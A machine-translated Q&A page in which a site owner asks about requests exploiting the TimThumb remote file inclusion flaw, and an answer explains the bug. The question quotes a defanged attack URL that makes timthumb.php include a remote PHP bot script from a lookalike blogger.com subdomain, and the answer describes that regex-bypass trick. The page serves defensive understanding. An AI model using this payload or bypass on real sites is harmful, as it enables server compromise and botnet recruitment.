Удаленное включение файлов через другой сервер? - PullRequest
Новая
       32

Удаленное включение файлов через другой сервер?

2 голосов
/ 14 декабря 2011

Мой сервер (mediaquarter.at) в настоящее время DDoSed по следующим запросам (с некоторыми незначительными изменениями): hXXp: //www.mediaquarter.at/http://www.madeineurope.org.uk/media/functions/timthumb/timthumb.php?src=http://blogger.com.midislandrental.com/.mods/sh.php (URL «деактивирован», поэтому никто не может случайно щелкнуть по нему))

Остерегайтесь, если вы пытаетесь загрузить ссылочный PHP-файл: в preg_replace активирован ключ / e, и код содержит несколько операторов eval - очистите его, прежде чем захотеть взглянуть на него!Похоже, pBot, вы можете найти больше информации об этом здесь: http://www.offensivecomputing.net/?q=node/1417

TimThumb уязвим для удаленного включения файлов (http://eromang.zataz.com/2011/09/20/wordpress-timthumb-rfi-vulnerability-used-as-botnet-recruitment-vector/) - кажется, довольно широко распространен в WordPress. Поэтому я бы понял, что кто-то вызывает hXXp://www.madeineurope.org.uk/media/functions/timthumb/timthumb.php?src=http://blogger.com.midislandrental.com/.mods/sh.php, чтобы использовать уязвимость.

Однако какой смысл пытаться вызвать ее через другой веб-сайт (mediaquarter.at), который приводит только к сообщению об ошибке 404. Кроме того, на моем сервере не работает WordPress, а вместо этого SilverStripe, так что это выглядит довольно бессмысленно.

Это просто ошибка / глупость для злоумышленникасбоку или я пропускаю какой-то вектор атаки здесь?

PS: Сервер - это просто дешевый веб-хостинг, и я вообще не могу его достать, поэтому я не могу проверить, есть лиизменения в системе.

1 Ответ

2 голосов
/ 14 декабря 2011

Если у вас нет файла timthumb.php, значит вы не уязвимы просто и просто. Это очень экзотическая уязвимость, которую я подробно изучил, потому что (пока) она единственная в своем роде. Вы должны прочитать подвиги , написанные с точки зрения атакующего .

Короче говоря, это кэширующие изображения с "доверенных" сайтов, таких как youtube.com и blogger.com Однако это регулярное выражение написано плохо и не связано с концом строки. тривиально изменить свой поддомен, чтобы обмануть эту проверку регулярных выражений. Вот почему доменное имя злоумышленника blogger.com.midislandrental.com.

Причина, по которой вы получаете DDoS, вероятно, в том, что выборка для timthumb.php не возвращает 404, или массивный ботнет, распространяющийся через timthumb.php, неправильно идентифицирует вас как уязвимого. Вы можете появляться в google dork для ботов, пытающихся найти уязвимых хостов.

...